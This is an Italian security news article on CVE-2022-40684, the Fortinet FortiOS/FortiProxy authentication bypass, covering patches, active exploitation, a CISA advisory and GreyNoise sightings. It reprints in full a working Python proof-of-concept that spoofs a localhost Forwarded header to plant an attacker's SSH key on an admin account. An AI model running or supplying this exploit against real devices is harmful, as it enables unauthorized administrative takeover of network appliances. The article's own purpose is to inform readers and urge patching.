Red Hot Cyber

Sicurezza informatica, cybercrime, hack
news, e altro ancora

Red Hot Cyber

Il PoC di sfruttamento dell’Authentication Bypass di Fortinet è online

14 Ottobre 2022 15:14

Fortinet ha recentemente corretto una vulnerabilità critica di bypass dell’autenticazione nei progetti FortiOS, FortiProxy e FortiSwitchManager (CVE-2022-40684). Questa vulnerabilità offre a un utente malintenzionato la possibilità di accedere come amministratore al sistema interessato.

È stato reso disponibile un codice exploit proof-of-concept (PoC), rendendo di fatto ancora più essenziale l’installazione delle patch prodotte dal vendor, qualora non siano impostati gli aggiornamenti automatizzati.

“FortiOS espone il portale web di gestione che consente a un utente di configurare il sistema”

Supporta Red Hot Cyber attraverso
  • L'acquisto del fumetto sul cybersecurity awareness (Primo episodio)
  • La sponsorizzazione della RHC Conference 2024
  • L'Acquisto di stock di fumetti sul Cybersecurity Awareness personalizzabili
  • La realizzazione di una puntata del fumetto BETTI-RHC
  • La realizzazione di strisce a fumetti brandizzate
  • Seguendo RHC su LinkedIn
  • Seguendo RHC su WhatsApp
  • Seguendo RHC su Google News

  • Iscrivendoti alla nostra newsletter

    ha affermato il ricercatore di sicurezza dell’azienda Horizon3.ai James Horseman .

    “Inoltre, un utente può SSH nel sistema che espone un’interfaccia CLI bloccata.”

    #!/usr/bin/python3
    import argparse
    import json
    import requests
    import urllib3
    requests.packages.urllib3.disable_warnings()
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    
    HEADERS = {
        'User-Agent': 'Report Runner',
        'Forwarded': 'for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"'
    }
    
    def format_key(key_file):
        with open(key_file) as f:
            k = f.read().strip()
    
        return(k)
    
    
    def add_key(target, username, key_file):
        key = format_key(key_file)
        j = {
            "ssh-public-key1": '\"' + key + '\"'
        }
        url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
        r = requests.put(url, headers=HEADERS, json=j, verify=False)
        if 'SSH key is good' not in r.text:
            print(f'[-] {target} is not vulnerable!')
        else:
            print(f'[+] SSH key for {username} added successfully!')
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
        parser.add_argument('-u', '--username', help='The user to add an SSH key file for', required=True)
        parser.add_argument('-k', '--key-file', help='The SSH key file', required=True)
        args = parser.parse_args()
    
        add_key(args.target, args.username, args.key_file)

    Il problema, rilevato come CVE-2022-40684 (punteggio CVSS: 9,6), riguarda una vulnerabilità di bypass dell’autenticazione che potrebbe consentire a un utente malintenzionato remoto di eseguire operazioni dannose sull’interfaccia amministrativa tramite richieste HTTP(S) appositamente predisposte.

    Sfruttare con successo la carenza, equivale a garantire l’accesso completo “per fare qualsiasi cosa” sul sistema interessato, inclusa la modifica delle configurazioni di rete, l’aggiunta di utenti malintenzionati e l’intercettazione del traffico di rete.

    Il rilascio del PoC arriva quando Fortinet ha avvertito di essere a conoscenza di uno sfruttamento attivo della falla di sicurezza, spingendo la Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti a emettere un avviso che esorta le agenzie federali a correggere il problema entro novembre 1, 2022.

    La società di intelligence sulle minacce GreyNoise ha rilevato 12 indirizzi IP univoci che utilizzavano la CVE-2022-40684 a partire dal 13 ottobre 2022, la maggior parte dei quali si trova in Germania, seguita da Stati Uniti, Brasile, Cina e Francia.